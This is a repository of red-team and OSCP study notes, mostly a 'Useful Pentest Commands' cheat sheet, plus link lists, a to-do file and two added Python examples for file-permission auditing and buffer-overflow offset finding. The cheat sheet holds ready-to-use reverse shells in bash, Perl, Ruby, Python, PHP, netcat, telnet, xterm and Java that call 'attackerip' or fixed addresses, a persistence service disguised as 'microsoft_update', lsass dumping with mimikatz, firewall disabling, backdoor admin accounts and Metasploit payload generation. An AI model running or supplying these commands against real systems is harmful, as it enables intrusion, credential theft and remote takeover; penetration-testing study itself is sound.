133 | [SleuthQL - SQLi Discovery Tool](https://github.com/RhinoSecurityLabs/SleuthQL)
134 |
135 | [Commix - Command Injection Exploiter](https://github.com/commixproject/commix)
136 |
137 | ## Source Code Review / Analysis
138 |
139 | [Static Analysis Tools](https://github.com/mre/awesome-static-analysis)
140 |
141 | ## Malware Analysis
142 |
143 | [Malware Analysis for Hedgehogs (YouTube)](https://www.youtube.com/channel/UCVFXrUwuWxNlm6UNZtBLJ-A)
144 |
145 | ## Misc
146 |
147 | [Windows Kernel Exploitation](https://rootkits.xyz/blog/2017/06/kernel-setting-up/)
148 |
149 | [Bunch of interesting tools/commands](https://github.com/adon90/pentest_compilation)
150 |
151 | [Forensics Field Guide](https://trailofbits.github.io/ctf/forensics/)
152 |
153 | [Bug Bounty Hunter's Methodology](https://github.com/jhaddix/tbhm)
154 |
155 | [**Fantastic** lecture resource for learning assembly](https://www.youtube.com/watch?v=H4Z0S9ZbC0g)
156 |
157 | [Awesome WAF bypass/command execution filter bypass](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8)
158 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/Useful Pentest Commands.md:
--------------------------------------------------------------------------------
1 | ## Nmap Full Web Vulnerable Scan:
2 |
3 | mkdir /usr/share/nmap/scripts/vulscan
4 |
5 | cd /usr/share/nmap/scripts/vulscan
6 |
7 | wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
8 |
9 | nmap -sS -sV --script=vulscan/vulscan.nse target
10 |
11 | nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv target
12 |
13 | nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -p80 target
14 |
15 | nmap -PN -sS -sV --script=vulscan --script-args vulscancorrelation=1 -p80 target
16 |
17 | nmap -sV --script=vuln target
18 |
19 | nmap -PN -sS -sV --script=all --script-args vulscancorrelation=1 target
20 |
21 |
22 | ## Dirb Directory Bruteforce:
23 | dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt
24 |
25 |
26 |
27 | ## Nikto Scanner:
28 | nikto -C all -h http://IP
29 |
30 | ## WordPress Scanner:
31 | wpscan --url http://IP/ --enumerate p
32 |
33 |
34 |
35 | ## Uniscan Scanning:
36 |
37 | uniscan.pl -u target -qweds
38 |
39 | ## HTTP Enumeration:
40 |
41 | httprint -h http://www.example.com -s signatures.txt
42 |
43 | ## SKIP Fish Scanner:
44 |
45 | skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
46 |
47 |
48 |
49 | ## Uniscan Scanning:
50 | uniscan -u http://www.hubbardbrook.org -qweds
51 |
52 | -q – Enable Directory checks
53 |
54 | -w – Enable File Checks
55 |
56 | -e – Enable robots.txt and sitemap.xml check
57 |
58 | -d – Enable Dynamic checks
59 |
60 | -s – Enable Static checks
61 |
62 |
63 | ## Skipfish Scanning:
64 |
65 | -m: number of simultaneous connections; -LVY: do not learn new keywords or update the wordlist from scan results
66 |
67 | skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP
68 |
69 |
70 | ## Nmap Ports Scan:
71 |
72 | 1) Decoy / masquerade: nmap -D RND:10 [target] (generates a random set of decoy source addresses)
73 |
74 | 2) Fragment packets: -f
75 |
76 | 3) Data padding: --data-length makes probes look like ordinary traffic rather than bare scan packets
77 |
78 | 4) Use auxiliary/scanner/ip/ipidseq to find a zombie host on the network, then use it for an idle scan: nmap -sI zombie-ip target
79 |
80 | 5) nmap --source-port 53 target
81 |
82 | nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f --mtu=24 --data-length=1337 -T2 target (randomized scan appearing to come from different IPs)
83 |
84 | nmap -Pn -T2 -sV --randomize-hosts IP1,IP2
85 |
86 | nmap --script smb-check-vulns.nse -p445 target (using NSE scripts)
87 |
88 | nmap -sU -P0 -T Aggressive -p123 target (timing templates T1-T5)
89 |
90 | nmap -sA -PN -sN target
91 |
92 | nmap -sS -sV -T5 -F -A -O target (version detection)
93 |
94 | nmap -sU -v target (Udp)
95 |
96 | nmap -sU -P0 (Udp)
97 |
98 | nmap -sC 192.168.31.10-12 (all scan default)
99 |
100 | ## Netcat Scanning:
101 |
102 | nc -v -w 1 target -z 1-1000
103 |
104 | for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done
105 |
106 | ## Unicornscan (us) Scanning:
107 |
108 | us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535
109 |
110 | ## Unicornscan Scanning:
111 |
112 | unicornscan X.X.X.X:a -r10000 -v
113 |
114 | ## Kernel Scanning:
115 |
116 | xprobe2 -v -p tcp:80:open 192.168.6.66
117 |
118 | ## Samba Enumeration:
119 |
120 | nmblookup -A target
121 |
122 | smbclient //MOUNT/share -I target -N
123 |
124 | rpcclient -U "" target
125 |
126 | enum4linux target
127 |
128 |
129 |
130 |
131 | ## SNMP Enumeration:
132 |
133 | snmpget -v 1 -c public IP version
134 |
135 | snmpwalk -v 1 -c public IP
136 |
137 | snmpbulkwalk -v 2 -c public IP
138 |
139 |
140 |
141 |
142 |
143 | ## Windows Useful commands:
144 |
145 | net localgroup Users
146 |
147 | net localgroup Administrators
148 |
149 | search dir/s *.doc
150 |
151 | system("start cmd.exe /k $cmd")
152 |
153 | sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
154 |
155 | /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
156 |
157 | mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
158 |
159 | Procdump.exe -accepteula -ma lsass.exe lsass.dmp
160 |
161 | mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
162 |
163 | C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
164 |
165 | C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
166 |
167 |
168 |
169 |
170 | ## Plink Tunnel:
171 |
172 | plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 X.X.X.X
173 |
174 | Enable RDP Access:
175 |
176 | reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
177 |
178 | netsh firewall set service remoteadmin enable
179 |
180 | netsh firewall set service remotedesktop enable
181 |
182 | Turn Off Firewall:
183 |
184 | netsh firewall set opmode disable
185 |
186 |
187 | ## Meterpreter:
188 |
189 | run getgui -u admin -p 1234
190 |
191 | run vnc -p 5043
192 |
193 |
194 | ## Add User Windows:
195 |
196 | net user test 1234 /add
197 |
198 | net localgroup administrators test /add
199 |
200 |
201 |
202 | ## Mimikatz:
203 |
204 | privilege::debug
205 |
206 | sekurlsa::logonPasswords full
207 |
208 |
209 | ## Passing the Hash:
210 |
211 | pth-winexe -U hash //IP cmd
212 |
213 |
214 | ## Password Cracking using Hashcat:
215 |
216 | hashcat -m 400 -a 0 hash /root/rockyou.txt
217 |
218 |
219 |
220 |
221 | ## Netcat commands:
222 |
223 | c:> nc -l -p 31337
224 |
225 | #nc 192.168.0.10 31337
226 |
227 | c:> nc -v -w 30 -p 31337 -l < secret.txt
228 |
229 | #nc -v -w 2 192.168.0.10 31337 > secret.txt
230 |
231 |
232 |
233 | ## Banner Grabbing:
234 |
235 | nc 192.168.0.10 80
236 |
237 | GET / HTTP/1.1
238 |
239 | Host: 192.168.0.10
240 |
241 | User-Agent: SPOOFED-BROWSER
242 |
243 | Referrer: K0NSP1RACY.COM
244 |
245 |
246 |
247 |
248 |
249 |
250 | ## window reverse shell:
251 |
252 | c:>nc -Lp 31337 -vv -e cmd.exe
253 |
254 | nc 192.168.0.10 31337
255 |
256 | c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe
257 |
258 | nc -lp 80
259 |
260 | #nc -lp 31337 -e /bin/bash
261 |
262 | nc 192.168.0.11 31337
263 |
264 | nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
265 |
266 |
267 |
268 |
269 | ## Find all SUID root files:
270 | find / -user root -perm -4000 -print
271 |
272 | ## Find all SGID root files:
273 | find / -group root -perm -2000 -print
274 |
275 | ## Find all SUID and SGID files owned by anyone:
276 | find / -perm -4000 -o -perm -2000 -print
277 |
278 | ## Find all files that are not owned by any user:
279 | find / -nouser -print
280 |
281 | ## Find all files that are not owned by any group:
282 | find / -nogroup -print
283 |
284 | ## Find all symlinks and what they point to:
285 | find / -type l -ls
286 |
287 |
288 |
289 |
290 | ## Python:
291 |
292 | python -c 'import pty;pty.spawn("/bin/bash")'
293 |
294 | python -m SimpleHTTPServer (Starting HTTP Server)
295 |
296 |
297 | ## PID:
298 |
299 | fuser -nv tcp 80 (list PID of process)
300 |
301 | fuser -k -n tcp 80 (Kill Process of PID)
302 |
303 |
304 | ## Hydra:
305 |
306 | hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)
307 |
308 | Mount Remote Windows Share:
309 |
310 | smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
311 |
312 |
313 | ## Compiling Exploit in Kali:
314 |
315 | gcc -m32 -o output32 hello.c (32 bit)
316 |
317 | gcc -o output hello.c (64 bit)
318 |
319 |
320 |
321 | ## Compiling Windows Exploits on Kali:
322 |
323 | cd /root/.wine/drive_c/MinGW/bin
324 |
325 | wine gcc -o ability.exe /tmp/exploit.c -lwsock32
326 |
327 | wine ability.exe
328 |
329 |
330 | ## NASM Command:
331 |
332 | nasm -f bin -o payload.bin payload.asm
333 |
334 | nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
335 |
336 |
337 |
338 | ## SSH Pivoting:
339 |
340 | ssh -D 127.0.0.1:1080 -p 22 user@IP
341 |
342 | Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
343 |
344 | proxychains commands target
345 |
346 |
347 | ## Pivoting to One Network to Another:
348 |
349 | ssh -D 127.0.0.1:1080 -p 22 user1@IP1
350 |
351 | Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
352 |
353 | proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
354 |
355 | Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
356 |
357 | proxychains commands target
358 |
359 |
360 | ## Pivoting Using metasploit:
361 |
362 | route add 10.1.1.0 255.255.255.0 1
363 |
364 | route add 10.2.2.0 255.255.255.0 1
365 |
366 | use auxiliary/server/socks4a
367 |
368 | run
369 |
370 | proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
371 |
372 |
373 | ## Exploit-DB search using CSV File:
374 |
375 | searchsploit-rb --update
376 |
377 | searchsploit-rb -t webapps -s WEBAPP
378 |
379 | searchsploit-rb --search="Linux Kernel"
380 |
381 | searchsploit-rb -a "author name" -s "exploit name"
382 |
383 | searchsploit-rb -t remote -s "exploit name"
384 |
385 | searchsploit-rb -p linux -t local -s "exploit name"
386 |
387 |
388 |
389 | ## For Privilege Escalation Exploit search:
390 |
391 | cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
392 |
393 |
394 |
395 |
396 | ## Metasploit Payloads:
397 |
398 | msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
399 |
400 | msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
401 |
402 | msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
403 |
404 | msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b "\x00" -t c
405 |
406 |
407 |
408 | ## Create a Linux Reverse Meterpreter Binary
409 |
410 | msfpayload linux/x86/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t elf -o shell
411 |
412 | Create Reverse Shell (Shellcode)
413 |
414 | msfpayload windows/shell_reverse_tcp LHOST= LPORT= R | msfencode -b "\x00\x0a\x0d"
415 |
416 | Create a Reverse Shell Python Script
417 |
418 | msfpayload cmd/unix/reverse_python LHOST= LPORT= R > shell.py
419 |
420 | Create a Reverse ASP Shell
421 |
422 | msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t asp -o shell.asp
423 |
424 | Create a Reverse Bash Shell
425 |
426 | msfpayload cmd/unix/reverse_bash LHOST= LPORT= R > shell.sh
427 |
428 |
429 | ## Create a Reverse PHP Shell
430 |
431 | msfpayload php/meterpreter_reverse_tcp LHOST= LPORT= R > shell.php
432 |
433 | Edit shell.php in a text editor to add LPORT= X >shell.exe
438 |
439 |
440 |
441 |
442 | ## Security Commands In Linux:
443 |
444 | ### find programs with a set uid bit
445 | find / -uid 0 -perm -4000
446 |
447 | ### find things that are world writable
448 | find / -perm -o=w
449 |
450 | ### find names with dots and spaces, there shouldn’t be any
451 | find / -name " " -print
452 | find / -name ".." -print
453 | find / -name ". " -print
455 |
456 | ### find files that are not owned by anyone
457 | find / -nouser
458 |
459 | ### look for files that are unlinked
460 | lsof +L1
461 |
462 | ### get information about procceses with open ports
463 | lsof -i
464 |
465 | ### look for weird things in arp
466 | arp -a
467 |
468 | ### look at all accounts including AD
469 | getent passwd
470 |
471 | ### look at all groups and membership including AD
472 | getent group
473 |
474 | ### list crontabs for all users including AD
475 | for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done
476 |
477 | ### generate random passwords
478 | cat /dev/urandom| tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?='|fold -w 12| head -n 4
479 |
480 | ### find all immutable files, there should not be any
481 | find . | xargs -I file lsattr -a file 2>/dev/null | grep '^....i'
482 |
483 | ### fix immutable files
484 | chattr -i file
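The SUID/SGID, world-writable and "not owned by anyone" checks above, together with the matching find one-liners in the earlier "Find all SUID root files" section, as an added Python example that is not part of the original guide: a single-pass audit of a directory tree, run here against a constructed temp tree. Skipping sticky world-writable directories (such as /tmp) is an assumption of this example, not something the find commands do.

```python
import os
import pwd
import stat
import tempfile


def audit_tree(root: str) -> dict:
    """One walk that reproduces the find checks above: setuid files, setgid
    files, world-writable entries and entries owned by no account in passwd.
    lstat is used so a symlink's own bits are never mistaken for its target's,
    and unreadable entries are skipped the way `2>/dev/null` hides them."""
    findings = {"suid": [], "sgid": [], "world_writable": [], "nouser": []}
    known_uids = {entry.pw_uid for entry in pwd.getpwall()}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue
            if mode & stat.S_ISUID:
                findings["suid"].append(path)
            if mode & stat.S_ISGID:
                findings["sgid"].append(path)
            # `find / -perm -o=w` also lists sticky directories such as /tmp;
            # those are expected, so only non-sticky world-writable entries count
            # (assumption of this example).
            if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
                findings["world_writable"].append(path)
            if st.st_uid not in known_uids:
                findings["nouser"].append(path)
    return findings


def demo() -> dict:
    """Build a constructed sample tree in a temp dir (not a real system) with
    one file per finding class and return the basenames the audit flags."""
    root = tempfile.mkdtemp(prefix="audit_demo_")
    samples = {"suid_helper": 0o4755, "sgid_helper": 0o2755,
               "world_writable.log": 0o666, "normal.conf": 0o644}
    for name, mode in samples.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    found = audit_tree(root)
    return {key: sorted(os.path.basename(p) for p in paths)
            for key, paths in found.items()}


if __name__ == "__main__":
    for key, names in demo().items():
        print(f"{key}: {names}")
```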
485 |
486 |
487 | ## Windows Buffer Overflow Exploitation Commands:
488 |
489 | msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b "\x00" -t c
490 |
491 |
492 | msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b "\x00" -t c
493 |
494 | ### COMMONLY USED BAD CHARACTERS:
495 | \x00\x0a\x0d\x20 For http request
496 | \x00\x0a\x0d\x20\x1a\x2c\x2e\x3a\x5c Ending with (0\n\r_)
497 |
498 | ### Useful Commands:
499 |
500 | pattern create
501 |
502 | pattern offset (EIP Address)
503 |
504 | pattern offset (ESP Address)
505 |
506 | fill with garbage up to the EIP offset, place the JMP ESP address in EIP, and put the shellcode at ESP.
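The pattern create / pattern offset steps above, as an added Python example that is not code from the original guide, Metasploit or mona: it rebuilds the Metasploit cyclic pattern, models a constructed 32-bit stack overwrite to show where a debugger-reported EIP value comes from, and looks the offset back up. The crash model (a fixed buffer directly before the saved return address) is an assumption made for illustration.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Rebuild the Metasploit/mona cyclic pattern (Aa0Aa1...Zz9): every
    Upper+lower+digit triplet is unique, so any 4-byte window occurs once."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern space exhausted (max 20280 bytes)")


def pattern_offset(value, length: int = 5000):
    """Offset of a crash value inside the pattern, like pattern_offset / !mona po.
    `value` is the integer the debugger shows in EIP/ESP (e.g. 0x41326241) or the
    raw 4 bytes. x86 is little-endian, so the integer is packed '<I' first; the
    reversed byte order is tried as a fallback. Returns None if not found."""
    pat = pattern_create(length)
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    for candidate in (needle, needle[::-1]):
        idx = pat.find(candidate)
        if idx != -1:
            return idx
    return None


def simulate_eip_overwrite(buffer_size: int, payload: bytes) -> int:
    """Constructed model of a 32-bit stack overflow, not a real target: a
    fixed-size buffer is assumed to sit directly before the saved return
    address (no canary, saved EBP ignored). Returns the integer a debugger
    would report in EIP once `payload` has overrun the buffer."""
    overwritten = payload[buffer_size:buffer_size + 4]
    return struct.unpack("<I", overwritten)[0]


def recover_offset(buffer_size: int, length: int = 5000) -> int:
    """Walk the procedure end to end: send the pattern, read the crashed EIP,
    look its offset up. The result must equal the hidden buffer size."""
    crashed_eip = simulate_eip_overwrite(buffer_size, pattern_create(length))
    return pattern_offset(crashed_eip, length)


if __name__ == "__main__":
    print(pattern_create(12))                                     # b'Aa0Aa1Aa2Aa3'
    print(hex(simulate_eip_overwrite(36, pattern_create(5000))))  # 0x41326241
    print(recover_offset(36))                                     # 36
```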
507 |
508 | !pvefindaddr pattern_create 5000
509 |
510 | !pvefindaddr suggest
511 |
512 | !pvefindaddr modules
513 |
514 | !pvefindaddr nosafeseh
515 |
516 |
517 | !mona config -set workingfolder C:\Mona\%p
518 |
519 | !mona config -get workingfolder
520 |
521 | !mona mod
522 |
523 | !mona bytearray -b "\x00\x0a"
524 |
525 | !mona pc 5000
526 |
527 | !mona po EIP
528 |
529 | !mona suggest
530 |
531 |
532 |
533 | ## SEH:
534 |
535 | !mona suggest
536 |
537 | !mona nosafeseh
538 |
539 | nseh="\xeb\x06\x90\x90" (next seh chain)
540 |
541 | iseh= !pvefindaddr p1 -n -o -i (POP POP RETURN or POP r32, POP r32, RETN)
542 |
543 |
544 |
545 | ## ROP (DEP):
546 |
547 | !mona modules
548 |
549 | !mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
550 |
551 | !mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
552 |
553 |
554 | ## ASLR:
555 |
556 | !mona noaslr
557 |
558 | ## EGG Hunter:
559 |
560 | !mona jmp -r esp
561 |
562 | !mona egg -t lxxl
563 |
564 | \xeb\xc4 (jump backward -60)
565 |
566 | buff=lxxllxxl+shell
567 |
568 | !mona egg -t 'w00t'
569 |
570 | ## GDB Debugger Commands:
571 |
572 | ### Setting Breakpoint :
573 |
574 | break *_start
575 |
576 | ### Execute Next Instruction :
577 |
578 | next
579 |
580 | step
581 |
582 | n
583 |
584 | s
585 |
586 | ### Continue Execution :
587 |
588 | continue
589 |
590 | c
591 |
592 | ### Data :
593 |
594 | checking 'REGISTERS' and 'MEMORY'
595 |
596 | Display Register Values : (Decimal , Binary , Hex )
597 |
598 | print /d --> Decimal
599 |
600 | print /t --> Binary
601 |
602 | print /x --> Hex
603 |
604 | O/P :
605 |
606 | (gdb) print /d $eax
607 |
608 | $17 = 13
609 |
610 | (gdb) print /t $eax
611 |
612 | $18 = 1101
613 |
614 | (gdb) print /x $eax
615 |
616 | $19 = 0xd
617 |
618 | (gdb)
619 |
620 |
621 |
622 | Display values of specific memory locations :
623 |
624 | command : x/nyz (Examine)
625 |
626 | n --> Number of fields to display
627 |
628 | y --> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
629 |
630 | z --> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
631 |
632 | ## Cheat Codes:
633 |
634 | ## Reverse Shellcode:
635 |
636 | ## BASH:
637 |
638 | bash -i >& /dev/tcp/192.168.23.10/443 0>&1
639 |
640 | exec /bin/bash 0&0 2>&0
641 |
644 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
645 |
650 | exec 5<>/dev/tcp/attackerip/4444
651 |
652 |
653 | cat <&5 | while read line; do $line 2>&5 >&5; done # or:
654 |
655 | while read line 0<&5; do $line 2>&5 >&5; done
656 |
657 | /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
658 |
659 | /bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1
660 |
661 |
662 |
663 |
664 | ## PERL:
665 | Shorter Perl reverse shell that does not depend on /bin/sh:
666 |
667 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
668 |
671 | If the target system is running Windows use the following one-liner:
672 |
673 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
674 |
677 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
678 |
681 |
682 |
683 | ## RUBY:
684 | Longer Ruby reverse shell that does not depend on /bin/sh:
685 |
686 | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
687 |
690 | If the target system is running Windows use the following one-liner:
691 |
692 | ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
693 |
696 | ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
697 |
700 |
701 |
702 | ## PYTHON:
703 |
704 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
705 |
708 |
709 |
710 | ## PHP:
711 | This code assumes that the TCP connection uses file descriptor 3.
712 |
713 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
714 |
717 | If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK
718 |
719 |
720 | ## NETCAT:
721 |
722 | Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
723 |
724 | nc -e /bin/sh attackerip 4444
725 |
726 | nc -e /bin/sh 192.168.37.10 443
727 |
728 | If the -e option is disabled, try this
729 |
730 | mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe
731 |
732 | mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
733 |
734 | /bin/sh | nc attackerip 4444
735 |
736 | /bin/sh | nc 192.168.23.10 443
737 |
738 | rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p
739 |
740 | rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0</tmp/p | /bin/sh 1>/tmp/p
741 |
742 | If you have the wrong version of netcat installed, try
743 |
744 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f
745 |
746 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
747 |
748 |
749 |
750 | ## TELNET:
751 | If netcat is not available or /dev/tcp
752 |
753 | mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
754 |
757 |
758 |
759 | ## XTERM:
760 | Xterm is the best..
761 |
762 | To catch incoming xterm, start an open X Server on your system (:1, which listens on TCP port 6001). One way to do this is with Xnest: it is available on Ubuntu.
763 |
764 | Xnest :1 # Note: The command starts with uppercase X
765 |
768 | Then remember to authorise on your system the target IP to connect to you:
770 |
771 | xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
772 | xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
773 |
774 | If you want anyone to connect to this spawned xterm try:
775 | xhost + # Run this INSIDE the spawned xterm on the open X Server
777 |
778 | Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
779 | xterm -display attackerip:1
781 |
782 | Or:
783 | $ DISPLAY=attackerip:0 xterm
785 |
786 | It will try to connect back to you, attackerip, on TCP port 6001.
787 | Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
788 |
789 | /usr/openwin/bin/xterm -display attackerip:1
791 |
792 |
793 | ## PHP:
794 | php -r '$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
795 |
796 |
797 | ## JAVA:
798 | r = Runtime.getRuntime()
799 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
800 | p.waitFor()
801 |
802 |
803 |
804 |
805 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/Useful Snippets.md:
--------------------------------------------------------------------------------
1 | # Useful Snippets
2 |
3 | $ find / -type f -newermt 20xx-xx-01 ! -newermt 20xx-xx-02 -ls 2>/dev/null
4 |
5 | [Source: Ippsec CrimeStoppers](https://www.youtube.com/watch?v=bgKth1K44QA)
6 |
7 | Show everything modified between two dates.
8 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/todo.md:
--------------------------------------------------------------------------------
1 | # To Do
2 |
3 |
4 | - Properly categorise everything
5 |
6 | - Figure out what categories to actually use!
7 | - Binary hacking / web app testing / infrastructure pentesting etc. are all pretty big areas, use these as main categories?
8 | - Method: Keep finding and adding stuff until it becomes unmaintainable without categories.
9 |
10 | - Work on the process document, making things gradually more automated!
11 |
12 |
13 | - Add the following links:
14 |
15 | http://pwnable.kr/
16 |
17 | https://microcorruption.com/login
18 |
19 | https://www.hackthis.co.uk/
20 |
21 | https://www.sabrefilms.co.uk/revolutionelite/
22 |
23 | https://www.wechall.net/
24 |
25 | https://cryptopals.com/
26 |
27 | https://holidayhackchallenge.com/past-challenges/
28 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Red-Team-Notes
2 | OSCP guide and Red Team assessment Guide
3 |
--------------------------------------------------------------------------------